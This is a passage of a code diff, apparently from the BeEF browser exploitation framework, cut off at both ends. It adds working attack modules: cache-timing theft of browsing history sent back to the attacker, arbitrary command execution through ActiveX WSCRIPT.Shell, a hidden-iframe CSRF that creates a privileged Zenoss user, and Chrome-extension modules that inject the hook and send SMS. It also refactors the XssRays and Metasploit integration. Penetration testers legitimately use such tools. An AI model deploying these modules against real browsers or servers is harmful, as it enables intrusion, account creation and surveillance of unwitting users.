if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
return options
else
else
print_error "Unable to retrieve metasploit payload options for exploit: #{msf_key}"
end
end
end
end
end
end
end
end
end
end
end
end

2
extensions/qrcode/qrcode.rb
View File

@@ -25,7 +25,7 @@ module Qrcode
require 'uri'
configuration = BeEF::Core::Configuration.instance
BeEF::Extension::Console::Banners.interfaces.each do |int|
BeEF::Core::Console::Banners.interfaces.each do |int|
print_success "QRCode images available for interface: #{int}"
data = ""
configuration.get("beef.extension.qrcode.target").each do |target|

4
extensions/xssrays/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 5000
clean_timeout: 3000
cross_domain: true
# set js_console_logs to false when using BeEF in production (also because IE browser doesn't support the console object)
# set js_console_logs to false when using BeEF in production (also because IE < 9 doesn't support the console object)
js_console_logs: false

41
extensions/xssrays/handler.rb
View File

@@ -17,28 +17,26 @@ module BeEF
module Extension
module Xssrays
class Handler
class Handler < BeEF::Core::Router::Router
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
HB = BeEF::Core::Models::HookedBrowser
def call(env)
@request = Rack::Request.new(env)
get '/' do
# verify if the request contains the hook token
# raise an exception if it's null or not found in the DB
beef_hook = @request['hbsess'] || nil
# raise an error if it's null or not found in the DB
beef_hook = params[:hbsess] || nil
(print_error "[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database";return) if beef_hook.nil? || HB.first(:session => beef_hook) == nil
rays_scan_id = @request['raysid'] || nil
rays_scan_id = params[:raysid] || nil
(print_error "[XSSRAYS] Raysid is null";return) if rays_scan_id.nil?
if @request['action'] == 'ray'
if params[:action] == 'ray'
# we received a ray
parse_rays(rays_scan_id)
else
if @request['action'] == 'finish'
if params[:action] == 'finish'
# we received a notification for finishing the scan
finalize_scan(rays_scan_id)
else
@@ -47,38 +45,31 @@ module BeEF
end
end
response = Rack::Response.new(
body = [],
status = 200,
header = {
'Pragma' => 'no-cache',
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
}
)
response
'Access-Control-Allow-Methods' => 'POST,GET'
end
# parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed.
def parse_rays(rays_scan_id)
xssrays_scan = XS.first(:id => rays_scan_id)
hooked_browser = HB.first(:session => @request['hbsess'])
hooked_browser = HB.first(:session => params[:hbsess])
if (xssrays_scan != nil)
xssrays_detail = XD.new(
:hooked_browser_id => hooked_browser.id,
:vector_name => @request['n'],
:vector_method => @request['m'],
:vector_poc => @request['p'],
:vector_name => params[:n],
:vector_method => params[:m],
:vector_poc => params[:p],
:xssraysscan_id => xssrays_scan.id
)
xssrays_detail.save
end
print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
end
# finalize the XssRays scan marking the scan as finished in the db

1
install
View File

@@ -36,3 +36,4 @@ puts "\nRun bundler in your BeEF folder: bundle install"
puts "\nRun BeEF: ./beef"
#Testing fork regroup

4
modules/browser/detect_firebug/command.js
View File

@@ -14,8 +14,8 @@
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

344
modules/browser/get_visited_domains/command.js Normal file
View File

@@ -0,0 +1,344 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
hidden_iframe.setAttribute('src','about:blank');
hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
var cycles = 0;
var exec_next = null;
function timer_interrupt() {
cycles++;
if (exec_next) {
var cmd = exec_next;
exec_next = null;
cmd();
}
}
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
{ 'category': 'Coding' },
{ 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
{ 'category': 'Security' },
{ 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
{ 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
{ 'category': 'Email' },
{ 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/**********************
* MAIN STATE MACHINE *
**********************/
var log_area;
var target_off = 0;
var attempt = 0;
var confirmed_visited = false;
var current_url, current_name;
var wait_cycles;
var frame_ready = false;
var start, stop, urls;
/* The frame was just pointed to data:... at this point. Initialize a new test, giving the
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read2, 0);
} else {
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
will be aborted by maybe_test_next(). */
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
function maybe_test_next() {
frame_ready = false;
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
target_off++;
}
if (confirmed_visited) {
log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited');
}
if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) {
if (!confirmed_visited)
//continue;
log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited');
confirmed_visited = false;
target_off++;
attempt = 0;
maybe_test_next();
} else {
current_url = targets[target_off].urls[attempt % targets[target_off].urls.length];
current_name = targets[target_off].name;
attempt++;
perform_check();
}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;
start_stuff();
});

26
modules/browser/get_visited_domains/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_visited_domains:
enable: true
category: "Browser"
name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]

14
extensions/initialization/config.yaml → modules/browser/get_visited_domains/module.rb
View File

@@ -13,9 +13,13 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
extension:
initialization:
enable: true
name: 'Initialization'
class Get_visited_domains < BeEF::Core::Command
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end

1037
modules/chrome_extensions/get_chrome_extensions/command.js Normal file
View File

File diff suppressed because it is too large Load Diff

26
modules/chrome_extensions/get_chrome_extensions/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_chrome_extensions:
enable: true
category: "Chrome Extensions"
name: "Get Chrome Extensions"
description: "This module detects if any of the top 1,000 Chrome extensions are installed."
authors: ["koto", "bcoles"]
target:
working: ["C"]
not_working: ["All"]

27
core/main/models/dynamicpayloads.rb → modules/chrome_extensions/get_chrome_extensions/module.rb
View File

@@ -13,23 +13,16 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
# More info:
# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
#
class Detect_chrome_extensions < BeEF::Core::Command
class DynamicPayloads
include DataMapper::Resource
storage_names[:default] = 'core_dynamicpayloads'
property :id, Serial
property :name, Text, :lazy => false
has n, :dynamic_payload_info
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end
end
end
end

15
modules/chrome_extensions/inject_beef/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;

15
modules/chrome_extensions/inject_beef/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
inject_beef:

15
modules/chrome_extensions/inject_beef/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Inject_beef < BeEF::Core::Command
def post_execute

15
modules/chrome_extensions/send_gvoice_sms/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var to = "<%= @to %>";
var message = "<%= @message %>";

15
modules/chrome_extensions/send_gvoice_sms/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
send_gvoice_sms:

15
modules/chrome_extensions/send_gvoice_sms/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Send_gvoice_sms < BeEF::Core::Command
def self.options

2
modules/debug/test_network_request/command.js
View File

@@ -25,7 +25,7 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var dataType = "<%= @dataType %>";
beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); } );
beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, JSON.stringify(response)); } );
});

34
modules/exploits/activex_command_execution/command.js Executable file
View File

@@ -0,0 +1,34 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
var result = "command was not sent";
try {
var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);
if (shell.toString() == 0) {
result = "command sent";
} else {
result = "command failed";
}
} catch(e) {
result = "command failed";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});

26
modules/exploits/activex_command_execution/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
activex_command_execution:
enable: true
category: "Exploits"
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["ALL"]

28
modules/exploits/activex_command_execution/module.rb Executable file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Activex_command_execution < BeEF::Core::Command
def self.options
return [
{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

33
modules/exploits/zenoss_add_user_csrf/command.js Normal file
View File

@@ -0,0 +1,33 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var user_level = '<%= @user_level %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_add_user_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/zenoss_add_user_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
name: "Zenoss Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

46
modules/exploits/zenoss_add_user_csrf/module.rb Normal file
View File

@@ -0,0 +1,46 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'user_level',
'type' => 'combobox',
'ui_label' => 'User Level',
'store_type' => 'arraystore',
'store_fields' => ['user_level'],
'store_data' => [
['Manager'],
['ZenManager'],
['ZenUser']
],
'emptyText' => 'Select a user level ("Manager" is highest)',
'valueField' => 'user_level',
'displayField' => 'user_level',
'mode' => 'local',
'autoWidth' => true
},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

32
modules/exploits/zenoss_daemon_csrf/command.js Normal file
View File

@@ -0,0 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
